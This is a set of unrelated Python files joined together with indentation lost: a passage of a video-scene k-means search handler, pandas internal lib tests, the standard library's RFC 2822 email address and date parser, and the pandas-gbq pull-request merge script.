if os.path.isfile(self.name + FILE_TREE) and (not forceRebuild):
print "Loading Tree from file"
self.tree = pickle.load(open(self.name + FILE_TREE, "rb"))
# Read files for deleted videos/added videos
if os.path.isfile(self.name + FILE_DEL):
self.deletedVideos = pickle.load(open(self.name + FILE_DEL, "rb"))
if os.path.isfile(self.name + FILE_ADD):
self.addedScenes = pickle.load(open(self.name + FILE_ADD, "rb"))
# Build the tree
else:
print "Reading data from database"
data = self.processHandler.runTaskWait(priority=1, target=self.readFromDB, kwargs={"db":self.videos.database.name, "collection":self.videos.name})
print "Building Tree"
self.tree = KMeansTree(False, [], [])
treeBuilder(result=[(self.tree, data)], processHandler=self.processHandler, parent=None, k=k, maxiterations=imax)
self.processHandler.waitForPriority(priority=1, waitTime=10)
#time.sleep(200)
print "Saving Tree"
pickle.dump(self.tree, open(self.name + FILE_TREE, "wb"))
pickle.dump(self.deletedVideos, open(self.name + FILE_DEL, "wb"))
pickle.dump(self.addedScenes, open(self.name + FILE_ADD, "wb"))
"""
Reads the feature data from the database and flattens it.
@param db name of the batabase
@param collection name of the collection
@return a list like [(feature,(vidHash,sceneId))]
where
feature is the flattend features of the scene
vidHash the hash of the video
sceneId the ID of the scene in the video
"""
def readFromDB(self, db, collection):
client = MongoClient(port=8099)
db = client[db]
videos = db[collection]
vids = videos.find({'searchable' : True})
data = []
# Get all scenes for all searchable videos
for vid in vids:
scenes = vid['scenes']
vidHash = vid['_id']
for scene in scenes:
sceneId = scene['_id']
# Flatten the features
feature = self.flattenFeatures(scene)
data.append((feature,(vidHash,sceneId)))
return data
"""
Flattens the features for a scenen
@param scene the scene containing the different features
@return the flattend features
"""
def flattenFeatures(self, scene):
edgeweight = self.featureWeight
colorweight = 1 - self.featureWeight
maxweight = max(edgeweight, colorweight)
colors = npy.array(scene["colorhist"])
edges = npy.array(scene["edges"])
#Normalize both features
# f_norm = (f - f_mean) / f_deviation
colors -= 500
edges -= 981
colors /= math.sqrt(4697656.84452)
edges /= math.sqrt(2980531.28808)
#Supersample colorhists to compensate for different length of vectors
#colors *= math.sqrt(2.8125) # 360/128 That's what is should have been
colors *= math.sqrt(2.5) # 320/128 #actually not correct magic number, but benchmark has optimized this number
# Which is actually fine because it just means the weighting basicallz does the same kind of operation afterwards
# "mean" distance is now 1; mutliply with sqrt(x) to project to 'x'
# also, multiply features with their weight
colors *= math.sqrt(colorweight / maxweight * 1000)
edges *= math.sqrt(edgeweight / maxweight * 1000)
result = npy.append(colors, edges)
return result #npy.array(scene['colorhist'])
"""
Calculates a precent value for a distance
@param dist distance in the tree
@return a value between 0 and 100
"""
def distQuality(self, dist):
# 1000 fits well with the way our flattening works
v = (1 - (dist/1000))
return max(v, 0)
"""
Search for a scene from a collection
@param tree kmeans tree to search on
@param vidHash id of the video of the query scene
@param sceneId id of the query scene
@param wantedNNs amount of NNs you want
@param maxTouches how many leaves should be touched at max. currently not different to wantedNNs
@return PrioriyQueue containing the results (>= wantedNNs if the tree is big enough)
"""
def search(self, vidHash, sceneId, wantedNNs=100, maxTouches=100, filterChecked=False):
# Get feature of query scene
vid = self.videos.find_one({'_id':vidHash})
scene = vid['scenes'][sceneId]
query = self.flattenFeatures(scene)
# Copy the list of videos which won't be found and add the source Video
toIgnore = self.deletedVideos.copy()
if not filterChecked:
toIgnore[vidHash] = True
# Search in the tree
results = self.processHandler.runTaskWait(priority=3, target=self.tree.search, args=(query, toIgnore, wantedNNs, maxTouches))
resqueue = Queue.PriorityQueue()
for result in results:
resqueue.put(result)
# Add the newlyUploaded scenes to the results
for feature,(video, scene) in self.addedScenes:
if filterChecked or (video != vidHash):
resqueue.put((dist(query,feature),(video, scene)))
results = []
for i in range(wantedNNs):
if resqueue.empty():
break
results.append(resqueue.get())
return results
"""
Add a video after the tree is build
It will be kept in an extra list
@param vidHash hash of the video
"""
def addVideo(self, vidHash):
# Keep the ShadowCopy updated
if self.shadowCopy != None:
self.shadowCopy.addVideo(vidHash)
vid = self.videos.find_one({'_id':vidHash})
if vid['searchable']:
if vidHash in self.deletedVideos:
self.deletedVideos.pop(vidHash)
pickle.dump(self.deletedVideos, open(self.name + FILE_DEL, "wb"))
else:
# Check if the video is on the addedScenes list already
for _,(vidId,_) in self.addedScenes:
if vidHash == vidId:
return
# If not add it to it
scenes = vid['scenes']
for scene in scenes:
sceneId = scene['_id']
feature = self.flattenFeatures(scene)
self.addedScenes.append((feature,(vidHash,sceneId)))
pickle.dump(self.addedScenes, open(self.name + FILE_ADD, "wb"))
"""
Disable a video so it can't be found anymore
@param vidHash hash of the video
"""
def deleteVideo(self, vidHash):
# Keep the ShadowCopy updated
if self.shadowCopy != None:
self.shadowCopy.deleteVideo(vidHash)
# Add to the deleted videos list
if not vidHash in self.deletedVideos:
self.deletedVideos[vidHash] = True
pickle.dump(self.deletedVideos, open(self.name + FILE_DEL, "wb"))
# Delete it from the dynamic list
addedScenesNew = []
needsSaving = False
for feature,(vidId,sceneNo) in self.addedScenes:
if not vidHash == vidId:
addedScenesNew.append((feature,(vidId,sceneNo)))
else:
needsSaving = True
if needsSaving:
self.addedScenes = addedScenesNew
pickle.dump(self.addedScenes, open(self.name + FILE_ADD, "wb"))
if __name__ == '__main__':
# Example code
#"""
client = MongoClient(port=8099)
db = client["findvid"]
videos = db["benchmark"]#_tiny"]#oldvids"]#"small"]
vid = videos.find_one({'filename':{'$regex':'.*target.*'}})
searchHandler = SearchHandler(videos, "testvidhandler", processhandler=processhandler.ProcessHandler(), forceRebuild=True)
searchHandler.addVideo(vid['_id'])
results = searchHandler.search(vid['_id'], 0, 100, 1000, True)
for i in range(10):
(d, vid) = results.get()
print (searchHandler.distQuality(d), vid)
#"""
|
|
# -*- coding: utf-8 -*-
import numpy as np
import pytest
from pandas._libs import lib, writers as libwriters
from pandas import Index
import pandas.util.testing as tm
class TestMisc(object):
def test_max_len_string_array(self):
arr = a = np.array(['foo', 'b', np.nan], dtype='object')
assert libwriters.max_len_string_array(arr) == 3
# unicode
arr = a.astype('U').astype(object)
assert libwriters.max_len_string_array(arr) == 3
# bytes for python3
arr = a.astype('S').astype(object)
assert libwriters.max_len_string_array(arr) == 3
# raises
with pytest.raises(TypeError):
libwriters.max_len_string_array(arr.astype('U'))
def test_fast_unique_multiple_list_gen_sort(self):
keys = [['p', 'a'], ['n', 'd'], ['a', 's']]
gen = (key for key in keys)
expected = np.array(['a', 'd', 'n', 'p', 's'])
out = lib.fast_unique_multiple_list_gen(gen, sort=True)
tm.assert_numpy_array_equal(np.array(out), expected)
gen = (key for key in keys)
expected = np.array(['p', 'a', 'n', 'd', 's'])
out = lib.fast_unique_multiple_list_gen(gen, sort=False)
tm.assert_numpy_array_equal(np.array(out), expected)
class TestIndexing(object):
def test_maybe_indices_to_slice_left_edge(self):
target = np.arange(100)
# slice
indices = np.array([], dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
for end in [1, 2, 5, 20, 99]:
for step in [1, 2, 4]:
indices = np.arange(0, end, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# not slice
for case in [[2, 1, 2, 0], [2, 2, 1, 0], [0, 1, 2, 1], [-2, 0, 2],
[2, 0, -2]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_indices_to_slice_right_edge(self):
target = np.arange(100)
# slice
for start in [0, 2, 5, 20, 97, 98]:
for step in [1, 2, 4]:
indices = np.arange(start, 99, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# not slice
indices = np.array([97, 98, 99, 100], dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
with pytest.raises(IndexError):
target[indices]
with pytest.raises(IndexError):
target[maybe_slice]
indices = np.array([100, 99, 98, 97], dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
with pytest.raises(IndexError):
target[indices]
with pytest.raises(IndexError):
target[maybe_slice]
for case in [[99, 97, 99, 96], [99, 99, 98, 97], [98, 98, 97, 96]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_indices_to_slice_both_edges(self):
target = np.arange(10)
# slice
for step in [1, 2, 4, 5, 8, 9]:
indices = np.arange(0, 9, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
# not slice
for case in [[4, 2, 0, -2], [2, 2, 1, 0], [0, 1, 2, 1]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_indices_to_slice_middle(self):
target = np.arange(100)
# slice
for start, end in [(2, 10), (5, 25), (65, 97)]:
for step in [1, 2, 4, 20]:
indices = np.arange(start, end, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# not slice
for case in [[14, 12, 10, 12], [12, 12, 11, 10], [10, 11, 12, 11]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_booleans_to_slice(self):
arr = np.array([0, 0, 1, 1, 1, 0, 1], dtype=np.uint8)
result = lib.maybe_booleans_to_slice(arr)
assert result.dtype == np.bool_
result = lib.maybe_booleans_to_slice(arr[:0])
assert result == slice(0, 0)
def test_get_reverse_indexer(self):
indexer = np.array([-1, -1, 1, 2, 0, -1, 3, 4], dtype=np.int64)
result = lib.get_reverse_indexer(indexer, 5)
expected = np.array([4, 2, 3, 6, 7], dtype=np.int64)
tm.assert_numpy_array_equal(result, expected)
def test_cache_readonly_preserve_docstrings():
# GH18197
assert Index.hasnans.__doc__ is not None
|
|
# Copyright (C) 2002-2007 Python Software Foundation
# Contact: email-sig@python.org
"""Email address parsing code.
Lifted directly from rfc822.py. This should eventually be rewritten.
"""
__all__ = [
'mktime_tz',
'parsedate',
'parsedate_tz',
'quote',
]
import time
SPACE = ' '
EMPTYSTRING = ''
COMMASPACE = ', '
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
data = data.split()
# The FWS after the comma after the day-of-week is optional, so search and
# adjust for this.
if data[0].endswith(',') or data[0].lower() in _daynames:
# There's a dayname here. Skip it
del data[0]
else:
i = data[0].rfind(',')
if i >= 0:
data[0] = data[0][i+1:]
if len(data) == 3: # RFC 850 date, deprecated
stuff = data[0].split('-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = s.find('+')
if i == -1:
i = s.find('-')
if i > 0:
data[3:] = [s[:i], s[i:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = mm.lower()
if mm not in _monthnames:
dd, mm = mm, dd.lower()
if mm not in _monthnames:
return None
mm = _monthnames.index(mm) + 1
if mm > 12:
mm -= 12
if dd[-1] == ',':
dd = dd[:-1]
i = yy.find(':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if not yy[0].isdigit():
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = tm.split(':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = int(yy)
dd = int(dd)
thh = int(thh)
tmm = int(tmm)
tss = int(tss)
except ValueError:
return None
# Check for a yy specified in two-digit format, then convert it to the
# appropriate four-digit format, according to the POSIX standard. RFC 822
# calls for a two-digit yy, but RFC 2822 (which obsoletes RFC 822)
# mandates a 4-digit yy. For more information, see the documentation for
# the time module.
if yy < 100:
# The year is between 1969 and 1999 (inclusive).
if yy > 68:
yy += 1900
# The year is between 2000 and 2068 (inclusive).
else:
yy += 2000
tzoffset = None
tz = tz.upper()
if tz in _timezones:
tzoffset = _timezones[tz]
else:
try:
tzoffset = int(tz)
except ValueError:
pass
# Convert a timezone offset into seconds ; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
# Daylight Saving Time flag is set to -1, since DST is unknown.
return yy, mm, dd, thh, tmm, tss, 0, 1, -1, tzoffset
def parsedate(data):
"""Convert a time string to a time tuple."""
t = parsedate_tz(data)
if isinstance(t, tuple):
return t[:9]
else:
return t
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
def quote(str):
"""Prepare string to be used in a quoted string.
Turns backslash and double quote characters into quoted pairs. These
are the only characters that need to be quoted inside a quoted string.
Does not add the surrounding double quotes.
"""
return str.replace('\\', '\\\\').replace('"', '\\"')
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of RFC 2822 in
front of you.
Note: this class interface is deprecated and may be removed in the future.
Use email.utils.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing
one or more addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.FWS = self.LWS + self.CR
self.atomends = self.specials + self.LWS + self.CR
# Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
# is obsolete syntax. RFC 2822 requires that we recognize obsolete
# syntax, so allow dots in phrases.
self.phraseends = self.atomends.replace('.', '')
self.field = field
self.commentlist = []
def gotonext(self):
"""Skip white space and extract comments."""
wslist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
if self.field[self.pos] not in '\n\r':
wslist.append(self.field[self.pos])
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else:
break
return EMPTYSTRING.join(wslist)
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
result = []
while self.pos < len(self.field):
ad = self.getaddress()
if ad:
result += ad
else:
result.append(('', ''))
return result
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(SPACE.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
fieldlen = len(self.field)
self.pos += 1
while self.pos < len(self.field):
self.gotonext()
if self.pos < fieldlen and self.field[self.pos] == ';':
self.pos += 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(SPACE.join(plist) + ' (' +
' '.join(self.commentlist) + ')', routeaddr)]
else:
returnlist = [(SPACE.join(plist), routeaddr)]
else:
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos += 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos += 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = False
self.pos += 1
self.gotonext()
adlist = ''
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = False
elif self.field[self.pos] == '>':
self.pos += 1
break
elif self.field[self.pos] == '@':
self.pos += 1
expectroute = True
elif self.field[self.pos] == ':':
self.pos += 1
else:
adlist = self.getaddrspec()
self.pos += 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC 2822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
preserve_ws = True
if self.field[self.pos] == '.':
if aslist and not aslist[-1].strip():
aslist.pop()
aslist.append('.')
self.pos += 1
preserve_ws = False
elif self.field[self.pos] == '"':
aslist.append('"%s"' % quote(self.getquote()))
elif self.field[self.pos] in self.atomends:
if aslist and not aslist[-1].strip():
aslist.pop()
break
else:
aslist.append(self.getatom())
ws = self.gotonext()
if preserve_ws and ws:
aslist.append(ws)
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return EMPTYSTRING.join(aslist)
aslist.append('@')
self.pos += 1
self.gotonext()
return EMPTYSTRING.join(aslist) + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos += 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else:
sdlist.append(self.getatom())
return EMPTYSTRING.join(sdlist)
def getdelimited(self, beginchar, endchars, allowcomments=True):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment.
If self is not looking at an instance of `beginchar' then
getdelimited returns the empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = False
self.pos += 1
while self.pos < len(self.field):
if quote:
slist.append(self.field[self.pos])
quote = False
elif self.field[self.pos] in endchars:
self.pos += 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
continue # have already advanced pos from getcomment
elif self.field[self.pos] == '\\':
quote = True
else:
slist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(slist)
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', False)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', True)
def getdomainliteral(self):
"""Parse an RFC 2822 domain-literal."""
return '[%s]' % self.getdelimited('[', ']\r', False)
def getatom(self, atomends=None):
"""Parse an RFC 2822 atom.
Optional atomends specifies a different set of end token delimiters
(the default is to use self.atomends). This is used e.g. in
getphraselist() since phrase endings must not include the `.' (which
is legal in phrases)."""
atomlist = ['']
if atomends is None:
atomends = self.atomends
while self.pos < len(self.field):
if self.field[self.pos] in atomends:
break
else:
atomlist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(atomlist)
def getphraselist(self):
"""Parse a sequence of RFC 2822 phrases.
A phrase is a sequence of words, which are in turn either RFC 2822
atoms or quoted-strings. Phrases are canonicalized by squeezing all
runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.FWS:
self.pos += 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.phraseends:
break
else:
plist.append(self.getatom(self.phraseends))
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC 2822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
if not x in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __iadd__(self, other):
# Set union, in-place
for x in other.addresslist:
if not x in self.addresslist:
self.addresslist.append(x)
return self
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
if not x in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __isub__(self, other):
# Set difference, in-place
for x in other.addresslist:
if x in self.addresslist:
self.addresslist.remove(x)
return self
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
return self.addresslist[index]
|
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Utility for creating well-formed pull request merges and pushing them to
# Apache.
# usage: ./apache-pr-merge.py (see config env vars below)
#
# Lightly modified from version of this script in incubator-parquet-format
from __future__ import print_function
from subprocess import check_output
from requests.auth import HTTPBasicAuth
import requests
import os
import six
import sys
import textwrap
from six.moves import input
PANDASGBQ_HOME = '.'
PROJECT_NAME = 'pandas-gbq'
print("PANDASGBQ_HOME = " + PANDASGBQ_HOME)
# Remote name with the PR
PR_REMOTE_NAME = os.environ.get("PR_REMOTE_NAME", "upstream")
# Remote name where results pushed
PUSH_REMOTE_NAME = os.environ.get("PUSH_REMOTE_NAME", "upstream")
GITHUB_BASE = "https://github.com/pydata/" + PROJECT_NAME + "/pull"
GITHUB_API_BASE = "https://api.github.com/repos/pydata/" + PROJECT_NAME
# Prefix added to temporary branches
BRANCH_PREFIX = "PR_TOOL"
os.chdir(PANDASGBQ_HOME)
auth_required = False
if auth_required:
GITHUB_USERNAME = os.environ['GITHUB_USER']
import getpass
GITHUB_PASSWORD = getpass.getpass('Enter github.com password for %s:'
% GITHUB_USERNAME)
def get_json_auth(url):
auth = HTTPBasicAuth(GITHUB_USERNAME, GITHUB_PASSWORD)
req = requests.get(url, auth=auth)
return req.json()
get_json = get_json_auth
else:
def get_json_no_auth(url):
req = requests.get(url)
return req.json()
get_json = get_json_no_auth
def fail(msg):
print(msg)
clean_up()
sys.exit(-1)
def run_cmd(cmd):
if isinstance(cmd, six.string_types):
cmd = cmd.split(' ')
output = check_output(cmd)
if isinstance(output, six.binary_type):
output = output.decode('utf-8')
return output
def continue_maybe(prompt):
result = input("\n%s (y/n): " % prompt)
if result.lower() != "y":
fail("Okay, exiting")
original_head = run_cmd("git rev-parse HEAD")[:8]
def clean_up():
print("Restoring head pointer to %s" % original_head)
run_cmd("git checkout %s" % original_head)
branches = run_cmd("git branch").replace(" ", "").split("\n")
for branch in [b for b in branches if b.startswith(BRANCH_PREFIX)]:
print("Deleting local branch %s" % branch)
run_cmd("git branch -D %s" % branch)
# Merge the requested PR and return the merge hash
def merge_pr(pr_num, target_ref):
pr_branch_name = "%s_MERGE_PR_%s" % (BRANCH_PREFIX, pr_num)
target_branch_name = "%s_MERGE_PR_%s_%s" % (BRANCH_PREFIX, pr_num,
target_ref.upper())
run_cmd("git fetch %s pull/%s/head:%s" % (PR_REMOTE_NAME, pr_num,
pr_branch_name))
run_cmd("git fetch %s %s:%s" % (PUSH_REMOTE_NAME, target_ref,
target_branch_name))
run_cmd("git checkout %s" % target_branch_name)
had_conflicts = False
try:
run_cmd(['git', 'merge', pr_branch_name, '--squash'])
except Exception as e:
msg = ("Error merging: %s\nWould you like to manually fix-up "
"this merge?" % e)
continue_maybe(msg)
msg = ("Okay, please fix any conflicts and 'git add' "
"conflicting files... Finished?")
continue_maybe(msg)
had_conflicts = True
commit_authors = run_cmd(['git', 'log', 'HEAD..%s' % pr_branch_name,
'--pretty=format:%an <%ae>']).split("\n")
distinct_authors = sorted(set(commit_authors),
key=lambda x: commit_authors.count(x),
reverse=True)
primary_author = distinct_authors[0]
commits = run_cmd(['git', 'log', 'HEAD..%s' % pr_branch_name,
'--pretty=format:%h [%an] %s']).split("\n\n")
merge_message_flags = []
merge_message_flags += ["-m", title]
if body is not None:
merge_message_flags += ["-m", '\n'.join(textwrap.wrap(body))]
authors = "\n".join(["Author: %s" % a for a in distinct_authors])
merge_message_flags += ["-m", authors]
if had_conflicts:
committer_name = run_cmd("git config --get user.name").strip()
committer_email = run_cmd("git config --get user.email").strip()
message = ("This patch had conflicts when merged, "
"resolved by\nCommitter: %s <%s>"
% (committer_name, committer_email))
merge_message_flags += ["-m", message]
# The string "Closes #%s" string is required for GitHub to correctly close
# the PR
merge_message_flags += [
"-m",
"Closes #%s from %s and squashes the following commits:"
% (pr_num, pr_repo_desc)]
for c in commits:
merge_message_flags += ["-m", c]
run_cmd(['git', 'commit', '--author="%s"' % primary_author] +
merge_message_flags)
continue_maybe("Merge complete (local ref %s). Push to %s?" % (
target_branch_name, PUSH_REMOTE_NAME))
try:
run_cmd('git push %s %s:%s' % (PUSH_REMOTE_NAME, target_branch_name,
target_ref))
except Exception as e:
clean_up()
fail("Exception while pushing: %s" % e)
merge_hash = run_cmd("git rev-parse %s" % target_branch_name)[:8]
clean_up()
print("Pull request #%s merged!" % pr_num)
print("Merge hash: %s" % merge_hash)
return merge_hash
def cherry_pick(pr_num, merge_hash, default_branch):
pick_ref = input("Enter a branch name [%s]: " % default_branch)
if pick_ref == "":
pick_ref = default_branch
pick_branch_name = "%s_PICK_PR_%s_%s" % (BRANCH_PREFIX, pr_num,
pick_ref.upper())
run_cmd("git fetch %s %s:%s" % (PUSH_REMOTE_NAME, pick_ref,
pick_branch_name))
run_cmd("git checkout %s" % pick_branch_name)
run_cmd("git cherry-pick -sx %s" % merge_hash)
continue_maybe("Pick complete (local ref %s). Push to %s?" % (
pick_branch_name, PUSH_REMOTE_NAME))
try:
run_cmd('git push %s %s:%s' % (PUSH_REMOTE_NAME, pick_branch_name,
pick_ref))
except Exception as e:
clean_up()
fail("Exception while pushing: %s" % e)
pick_hash = run_cmd("git rev-parse %s" % pick_branch_name)[:8]
clean_up()
print("Pull request #%s picked into %s!" % (pr_num, pick_ref))
print("Pick hash: %s" % pick_hash)
return pick_ref
def fix_version_from_branch(branch, versions):
# Note: Assumes this is a sorted (newest->oldest) list of un-released
# versions
if branch == "master":
return versions[0]
else:
branch_ver = branch.replace("branch-", "")
return filter(lambda x: x.name.startswith(branch_ver), versions)[-1]
pr_num = input("Which pull request would you like to merge? (e.g. 34): ")
pr = get_json("%s/pulls/%s" % (GITHUB_API_BASE, pr_num))
url = pr["url"]
title = pr["title"]
body = pr["body"]
target_ref = pr["base"]["ref"]
user_login = pr["user"]["login"]
base_ref = pr["head"]["ref"]
pr_repo_desc = "%s/%s" % (user_login, base_ref)
if pr["merged"] is True:
print("Pull request {0} has already been merged, please backport manually"
.format(pr_num))
sys.exit(0)
if not bool(pr["mergeable"]):
msg = ("Pull request {0} is not mergeable in its current form.\n"
"Continue? (experts only!)".format(pr_num))
continue_maybe(msg)
print("\n=== Pull Request #%s ===" % pr_num)
print("title\t%s\nsource\t%s\ntarget\t%s\nurl\t%s"
% (title, pr_repo_desc, target_ref, url))
continue_maybe("Proceed with merging pull request #%s?" % pr_num)
merged_refs = [target_ref]
merge_hash = merge_pr(pr_num, target_ref)
|
|
"""
